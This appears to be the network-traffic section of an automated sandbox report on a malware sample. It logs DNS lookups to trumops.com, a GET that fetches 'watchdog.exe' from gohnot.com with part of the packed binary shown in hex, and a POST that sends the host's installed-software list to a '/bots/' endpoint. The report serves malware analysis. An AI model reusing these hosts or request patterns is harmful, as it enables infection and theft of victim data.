                                                                    Oct 18, 2021 08:02:35.551723003 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.551727057 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.551769018 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.551810980 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.551820993 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.551848888 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.551848888 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.551887035 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.551899910 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.551923037 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.551940918 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.551961899 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.551973104 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.551999092 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.552047014 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.552047014 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.552088976 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.552125931 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.552136898 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.552164078 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.552201986 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.552212954 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.552249908 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.570622921 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.570657015 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.571324110 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.587641954 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.587668896 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.587697029 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.587709904 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.587724924 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.587738991 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.587750912 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.587763071 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.587779999 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.587805033 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.587837934 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.587850094 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.587878942 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.587889910 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.587889910 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.587917089 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.587919950 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.587944031 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.587944984 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.587958097 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.587977886 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588006973 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588009119 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.588030100 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.588032007 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588052988 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588082075 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.588085890 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588099003 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588108063 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.588119030 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588140011 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588151932 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.588166952 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588191986 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588217974 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588233948 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.588238955 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588248014 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.588265896 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588277102 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.588291883 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588316917 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588347912 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588347912 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.588361025 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588372946 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.588382006 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588401079 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588422060 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588501930 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.591701984 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.591737986 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.591805935 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.633627892 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:36.726557016 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:43.437769890 CEST49841443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:02:43.437808990 CEST44349841104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:02:43.437978029 CEST49841443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:02:43.439759970 CEST49841443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:02:43.439805031 CEST44349841104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:02:44.491847992 CEST44349841104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:02:44.492366076 CEST49841443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:02:44.492424965 CEST44349841104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:02:44.493196964 CEST49841443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:02:44.493211031 CEST44349841104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:02:44.496114016 CEST44349841104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:02:44.496251106 CEST49841443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:02:44.499594927 CEST49841443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:02:44.499773979 CEST44349841104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:02:44.500257015 CEST49841443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:02:44.500310898 CEST44349841104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:02:44.548733950 CEST49841443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:03:05.609975100 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:03:05.626013041 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:03:14.507342100 CEST49841443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:03:14.507356882 CEST44349841104.21.79.9192.168.2.4

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Oct 18, 2021 08:01:27.399797916 CEST5453153192.168.2.48.8.8.8
                                                                    Oct 18, 2021 08:01:27.420635939 CEST53545318.8.8.8192.168.2.4
                                                                    Oct 18, 2021 08:01:27.427885056 CEST4971453192.168.2.48.8.8.8
                                                                    Oct 18, 2021 08:01:27.448276043 CEST53497148.8.8.8192.168.2.4
                                                                    Oct 18, 2021 08:01:27.454231977 CEST5802853192.168.2.48.8.8.8
                                                                    Oct 18, 2021 08:01:27.475474119 CEST53580288.8.8.8192.168.2.4
                                                                    Oct 18, 2021 08:01:27.512409925 CEST5309753192.168.2.48.8.8.8
                                                                    Oct 18, 2021 08:01:27.532886028 CEST53530978.8.8.8192.168.2.4
                                                                    Oct 18, 2021 08:01:27.647305965 CEST4925753192.168.2.48.8.8.8
                                                                    Oct 18, 2021 08:01:27.668375969 CEST53492578.8.8.8192.168.2.4
                                                                    Oct 18, 2021 08:01:31.396657944 CEST6238953192.168.2.48.8.8.8
                                                                    Oct 18, 2021 08:01:31.417987108 CEST53623898.8.8.8192.168.2.4
                                                                    Oct 18, 2021 08:01:33.459969044 CEST4991053192.168.2.48.8.8.8
                                                                    Oct 18, 2021 08:01:33.481452942 CEST53499108.8.8.8192.168.2.4
                                                                    Oct 18, 2021 08:01:45.280299902 CEST5585453192.168.2.48.8.8.8
                                                                    Oct 18, 2021 08:01:45.301007032 CEST53558548.8.8.8192.168.2.4
                                                                    Oct 18, 2021 08:02:35.220702887 CEST5125553192.168.2.48.8.8.8
                                                                    Oct 18, 2021 08:02:35.241746902 CEST53512558.8.8.8192.168.2.4
                                                                    Oct 18, 2021 08:02:36.869208097 CEST6152253192.168.2.48.8.8.8
                                                                    Oct 18, 2021 08:02:36.890609980 CEST53615228.8.8.8192.168.2.4
                                                                    Oct 18, 2021 08:02:41.302114964 CEST5233753192.168.2.48.8.8.8
                                                                    Oct 18, 2021 08:02:41.320368052 CEST53523378.8.8.8192.168.2.4
                                                                    Oct 18, 2021 08:02:43.415529966 CEST5504653192.168.2.48.8.8.8
                                                                    Oct 18, 2021 08:02:43.435981989 CEST53550468.8.8.8192.168.2.4

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                    Oct 18, 2021 08:01:27.399797916 CEST192.168.2.48.8.8.80xc514Standard query (0)trumops.com16IN (0x0001)
                                                                    Oct 18, 2021 08:01:27.427885056 CEST192.168.2.48.8.8.80xb2e2Standard query (0)logs.trumops.com16IN (0x0001)
                                                                    Oct 18, 2021 08:01:27.454231977 CEST192.168.2.48.8.8.80x23baStandard query (0)8db1a514-f568-41bf-af6a-dffb7cea0346.uuid.trumops.com16IN (0x0001)
                                                                    Oct 18, 2021 08:01:27.512409925 CEST192.168.2.48.8.8.80x79ccStandard query (0)trumops.comA (IP address)IN (0x0001)
                                                                    Oct 18, 2021 08:01:27.647305965 CEST192.168.2.48.8.8.80xab2eStandard query (0)server1.trumops.comA (IP address)IN (0x0001)
                                                                    Oct 18, 2021 08:01:31.396657944 CEST192.168.2.48.8.8.80x6b1fStandard query (0)trumops.comA (IP address)IN (0x0001)
                                                                    Oct 18, 2021 08:01:33.459969044 CEST192.168.2.48.8.8.80x808Standard query (0)server1.trumops.comA (IP address)IN (0x0001)
                                                                    Oct 18, 2021 08:01:45.280299902 CEST192.168.2.48.8.8.80xd048Standard query (0)server1.trumops.comA (IP address)IN (0x0001)
                                                                    Oct 18, 2021 08:02:35.220702887 CEST192.168.2.48.8.8.80xa649Standard query (0)gohnot.comA (IP address)IN (0x0001)
                                                                    Oct 18, 2021 08:02:36.869208097 CEST192.168.2.48.8.8.80xa3f8Standard query (0)e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com16IN (0x0001)
                                                                    Oct 18, 2021 08:02:41.302114964 CEST192.168.2.48.8.8.80xf932Standard query (0)trumops.comA (IP address)IN (0x0001)
                                                                    Oct 18, 2021 08:02:43.415529966 CEST192.168.2.48.8.8.80xf342Standard query (0)server1.trumops.comA (IP address)IN (0x0001)

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                    Oct 18, 2021 08:01:27.420635939 CEST8.8.8.8192.168.2.40xc514No error (0)trumops.comTXT (Text strings)IN (0x0001)
                                                                    Oct 18, 2021 08:01:27.448276043 CEST8.8.8.8192.168.2.40xb2e2No error (0)logs.trumops.comTXT (Text strings)IN (0x0001)
                                                                    Oct 18, 2021 08:01:27.475474119 CEST8.8.8.8192.168.2.40x23baName error (3)8db1a514-f568-41bf-af6a-dffb7cea0346.uuid.trumops.comnonenone16IN (0x0001)
                                                                    Oct 18, 2021 08:01:27.668375969 CEST8.8.8.8192.168.2.40xab2eNo error (0)server1.trumops.com172.67.139.144A (IP address)IN (0x0001)
                                                                    Oct 18, 2021 08:01:27.668375969 CEST8.8.8.8192.168.2.40xab2eNo error (0)server1.trumops.com104.21.79.9A (IP address)IN (0x0001)
                                                                    Oct 18, 2021 08:01:33.481452942 CEST8.8.8.8192.168.2.40x808No error (0)server1.trumops.com172.67.139.144A (IP address)IN (0x0001)
                                                                    Oct 18, 2021 08:01:33.481452942 CEST8.8.8.8192.168.2.40x808No error (0)server1.trumops.com104.21.79.9A (IP address)IN (0x0001)
                                                                    Oct 18, 2021 08:01:45.301007032 CEST8.8.8.8192.168.2.40xd048No error (0)server1.trumops.com104.21.79.9A (IP address)IN (0x0001)
                                                                    Oct 18, 2021 08:01:45.301007032 CEST8.8.8.8192.168.2.40xd048No error (0)server1.trumops.com172.67.139.144A (IP address)IN (0x0001)
                                                                    Oct 18, 2021 08:02:35.241746902 CEST8.8.8.8192.168.2.40xa649No error (0)gohnot.com172.67.196.11A (IP address)IN (0x0001)
                                                                    Oct 18, 2021 08:02:35.241746902 CEST8.8.8.8192.168.2.40xa649No error (0)gohnot.com104.21.92.165A (IP address)IN (0x0001)
                                                                    Oct 18, 2021 08:02:36.890609980 CEST8.8.8.8192.168.2.40xa3f8No error (0)e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.comTXT (Text strings)IN (0x0001)
                                                                    Oct 18, 2021 08:02:43.435981989 CEST8.8.8.8192.168.2.40xf342No error (0)server1.trumops.com104.21.79.9A (IP address)IN (0x0001)
                                                                    Oct 18, 2021 08:02:43.435981989 CEST8.8.8.8192.168.2.40xf342No error (0)server1.trumops.com172.67.139.144A (IP address)IN (0x0001)

                                                                    HTTP Request Dependency Graph

                                                                    • server1.trumops.com
                                                                    • gohnot.com

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.2.449767172.67.139.144443C:\Windows\rss\csrss.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    1192.168.2.449768172.67.139.144443C:\Windows\rss\csrss.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    2192.168.2.449769104.21.79.9443C:\Windows\rss\csrss.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    3192.168.2.449841104.21.79.9443C:\Windows\rss\csrss.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    4192.168.2.449816172.67.196.1180C:\Windows\rss\csrss.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 18, 2021 08:02:35.261605024 CEST5138OUTGET /370c4779d730135afa0e64399be9936c/watchdog.exe HTTP/1.1
                                                                    Host: gohnot.com
                                                                    User-Agent: Go-http-client/1.1
                                                                    Uuid: 8db1a514-f568-41bf-af6a-dffb7cea0346
                                                                    Version: 183
                                                                    Accept-Encoding: gzip
                                                                    Oct 18, 2021 08:02:35.287981033 CEST5139INHTTP/1.1 200 OK
                                                                    Date: Mon, 18 Oct 2021 06:02:35 GMT
                                                                    Content-Type: application/octet-stream
                                                                    Content-Length: 2102272
                                                                    Connection: keep-alive
                                                                    content-disposition: attachment; filename=watchdog.exe
                                                                    etag: "61680a87-201400"
                                                                    last-modified: Thu, 14 Oct 2021 10:46:31 GMT
                                                                    Cache-Control: max-age=3600
                                                                    CF-Cache-Status: HIT
                                                                    Age: 125
                                                                    Accept-Ranges: bytes
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SIEIN%2F1XF0Uz1zUWhWjjtVKcK6yr2rylxw1%2B9wHdhNwCZmlQnik1Y11rhtQkNHt8%2F06zowdGfNcUGMzVlV7%2BzZVdUTz7EvckfqyHt3WHegA8D9QEHcXnQQxKcd0I"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Vary: Accept-Encoding
                                                                    Server: cloudflare
                                                                    CF-RAY: 69ff8f0268394357-FRA
                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                    Data Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 00 00 00 00 00 b4 4b 00 00 00 00 00 e0 00 03 03 0b 01 03 00 00 10 20 00 00 10 00 00 00 70 2d 00 00 8d 4d 00 00 80 2d 00 00 90 4d 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 a0 4d 00 00 10 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 90 4d 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 70 2d 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 10 20 00 00 80 2d 00 00 10 20 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 90 4d 00 00 02 00 00 00 12 20 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELK p-M-M@MMUPX0p-UPX1 - @UPX2M
                                                                    Oct 18, 2021 08:02:35.288007021 CEST5141INData Raw: 00 40 00 00 c0 33 2e 39 35 00 55 50 58 21 0d 09 08 09 59 97 50 98 0e ef ba a0 1e 64 4d 00 e9 0c 20 00 00 b6 4b 00 26 27 00 ab ff ff ff ff ff 20 47 6f 20 62 75 69 6c 64 20 49 44 3a 20 22 38 4c 67 64 4e 77 31 30 4f 4d 6e 6a 6e 45 61 66 ff ff 6f ff
                                                                    Data Ascii: @3.95UPX!YPdM K&' Go build ID: "8LgdNw10OMnjnEafoouob/F_u>d7bw5LzGyMt067q/f_4En-IIykrT4Xu-NukD/RUnzYHIbGfj1LuaRla" d;av 'D$$`k&fdnlL$hmg
                                                                    Oct 18, 2021 08:02:35.288022995 CEST5142INData Raw: 28 c3 88 c1 57 72 50 84 1b b4 07 0c a9 08 71 3f 90 7d de 6c e4 a9 20 1b f8 1b 21 df ad c0 e2 ca 88 15 bb fa 01 45 e5 1b 02 8f 10 2c 27 e6 95 4d 43 db 5d 39 d9 18 20 bb 9c 8b e2 a9 2b 74 90 61 97 52 a9 04 39 28 20 64 b1 3b 7a f8 08 aa b4 f3 57 8d
                                                                    Data Ascii: (WrPq?}l !E,'MC]9 +taR9( d;zW=59ky,.@yi-(8HXh:xI.>!$2erxHj!pTq60#.?WD8kmNq_VN]SY?.7
                                                                    Oct 18, 2021 08:02:35.288041115 CEST5143INData Raw: d9 a7 f0 bf 42 a2 88 a0 57 c9 0f 2e c1 75 06 0f 8b 86 02 97 f6 1f 1a 2e c0 75 02 7b 5b 6a 05 80 dd 13 76 df 41 40 18 8b 88 90 11 90 94 e4 90 17 89 fb ff 5f f5 cb c1 e1 11 e4 89 d3 31 ca c1 e9 07 31 d1 89 da c1 eb 10 31 cb 89 98 45 c1 ff 37 b8 8d
                                                                    Data Ascii: BW.u.u{[jvA@_111E7M15ivEbxVsAuF&(fQ2f<c'9({'~7-E!2r5X*>- tgIfY^I t)1wxMeY!(@Q
                                                                    Oct 18, 2021 08:02:35.288058043 CEST5145INData Raw: 1f 9a 57 c1 a8 d6 44 6d 1a 60 3e 6c 8d 1f c2 2d 70 2a 0b 02 8a ac 64 ab 33 3e 1e 66 67 70 a0 8b 4f f0 72 e4 ad 40 7f 5e 23 01 7e 30 b8 97 20 ed 79 ef 40 76 23 0e 4c 30 87 d1 47 e6 13 60 7f 40 ae 1c 83 c0 ac b0 02 66 2a 0a f0 14 b9 e8 a8 44 9d e5
                                                                    Data Ascii: WDm`>l-p*d3>fgpOr@^#~0 y@v#L0G`@f*DT+o0BqGt4;=&:%HId,fQlba0RlLp)-pKhxp$BA9M49L{^pA,}b?1DI'\8"?v>ehxAx
                                                                    Oct 18, 2021 08:02:35.288084984 CEST5146INData Raw: 24 19 12 4d a8 ca 28 a6 e9 13 ae 78 fc a1 40 44 e8 09 83 c3 0c a4 52 fd 8b 7b fd 4b e0 1b fa 17 77 2d 8b 3f b4 01 fd 39 fa 76 1d fc ff 1f e8 f0 28 ce 29 fd 29 fa 39 e9 76 09 46 29 e9 39 c6 7c cd eb a8 8c 8b 83 1f 37 d7 eb df 0c 38 18 20 05 ff bd
                                                                    Data Ascii: $M(x@DR{Kw-?9v())9vF)9|78 L`0|4<$lCuL$)80@&)4D<-z80.btQL_a%I=z?[H,y@c$70i?Y(6-p*TY8Y7>lEz*P89Pf
                                                                    Oct 18, 2021 08:02:35.288100004 CEST5147INData Raw: 01 06 9c 49 38 85 a3 c2 00 d5 20 13 62 24 46 f8 05 01 bc ee ff be 02 23 d8 df f8 20 89 5c 24 04 14 32 32 c1 df 20 10 b0 92 b2 62 be 19 02 2b 23 0c 80 06 19 f1 32 f5 0b 5c 31 49 14 1c f5 af cf 6e 81 84 46 10 bb df eb 11 90 70 16 17 2c 60 26 51 58
                                                                    Data Ascii: I8 b$F# \$22 b+#2\1InFp,`&QXYM9Q!uSP`GCJ#i`DF@'O[EJBBJKP07pl!A#?A(#:tx^G\2Dp%B*X3GZH
                                                                    Oct 18, 2021 08:02:35.288113117 CEST5149INData Raw: b3 b1 e1 e9 7e 76 f4 3c 2e 32 3d 97 74 28 31 ff 97 ff 0b de 14 72 0e d8 8d 45 01 68 77 74 29 c1 89 ca f7 d9 c1 f9 06 d2 3b f8 1f 21 c8 01 f0 30 34 9e 38 97 57 c0 41 4e f1 a0 22 34 60 20 58 01 03 f3 5c 21 bc 6a 7f 6c 05 46 c6 7c 24 10 16 1c 60 2a
                                                                    Data Ascii: ~v<.2=t(1rEhwt);!048WAN"4` X\!jlF|$`*$)ZYq!+E|4tE_q_/]Kj hB9sG4V8?(ArZw ArkZ GX+\P ;A*\F1$",V3<h
                                                                    Oct 18, 2021 08:02:35.288130999 CEST5150INData Raw: 52 c0 cb 94 cb 6c b8 e0 01 94 16 a3 a0 5a 89 c2 ad a4 5e d1 9b 3d ea eb f1 89 f8 e3 d3 88 07 9c 0d b9 08 4f 27 4d 5e 87 2a 8d ac df 93 07 9f ff f7 00 bc 78 f0 7c 3e 5f 1c 8b 48 08 81 f9 6d 54 1a 6c ff 88 ae b3 3e e9 72 f9 8c 02 25 79 16 29 02 f1
                                                                    Data Ascii: RlZ^=O'M^*x|>_HmTl>r%y)W6.=j+E9'O"ku\VR>IJ*bVm>p kt=FB3hy?(hFSx;?Y|%Ux$: \GWx?PrO#I
                                                                    Oct 18, 2021 08:02:35.288144112 CEST5152INData Raw: 68 63 70 0a 6f 76 c7 47 b3 47 6f 5b e2 b7 b5 d6 76 c5 0f 2c 10 00 3b 14 02 bd 49 38 46 1d 47 54 75 45 89 47 a3 23 f3 af fa 3c 8e 03 f0 fc 8d 74 24 34 19 f0 d6 54 42 68 3d 44 1e 5c 7c 31 06 dc d4 64 89 4c 55 85 b0 02 32 32 3e 85 db d9 48 45 b4 ff
                                                                    Data Ascii: hcpovGGo[v,;I8FGTuEG#<t$4TBh=D\|1dLU22>HEt\O8f06pWdhwjlptF[/C +U(KLmq'0'tp(#'I07E|(,3Wl/LT_AJGgR_K@~d
                                                                    Oct 18, 2021 08:02:35.288865089 CEST5153INData Raw: 7a 30 e4 0f 84 d5 0a 5a 12 ed 09 e8 12 77 d4 d8 44 7d 57 25 46 89 dc 2d fb 1f 03 1f 70 80 25 44 0f b6 12 f6 c2 01 1e 81 7b 9c 52 3f 8f 75 09 99 8c 48 19 7e ec 66 2b f3 44 01 08 8b 57 02 9b 01 9c 9d 85 8c 71 90 49 d8 e3 06 db c3 71 01 07 84 c2 26
                                                                    Data Ascii: z0ZwD}W%F-p%D{R?uH~f+DWqIq&PciQi8pD3J02,\aHDJ# p_ DT.P<?8tfXg,\wg9t1i1OCTC5
                                                                    Oct 18, 2021 08:03:05.609975100 CEST7422OUTData Raw: 00
                                                                    Data Ascii:


                                                                    HTTPS Proxied Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.2.449767172.67.139.144443C:\Windows\rss\csrss.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2021-10-18 06:01:27 UTC0OUTPOST /bots/post-ia-data?uuid=8db1a514-f568-41bf-af6a-dffb7cea0346 HTTP/1.1
                                                                    Host: server1.trumops.com
                                                                    User-Agent: Go-http-client/1.1
                                                                    Content-Length: 19043
                                                                    Content-Type: application/json; charset=UTF-8
                                                                    Accept-Encoding: gzip
                                                                    2021-10-18 06:01:27 UTC0OUTData Raw: 5b 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 34 36 34 35 33 38 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 46 6f 6e 74 63 6f 72 65 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 56 69 73 75 61 6c 20 43 2b 2b 20 32 30 31 32 20 78 36 34 20 4d 69 6e 69 6d 75 6d 20 52 75 6e 74 69 6d 65 20 2d 20 31 31 2e 30
                                                                    Data Ascii: [{"display_name":"Update for Microsoft Office 2016 (KB4464538) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Fontcore","display_version":"","install_date":""},{"display_name":"Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0
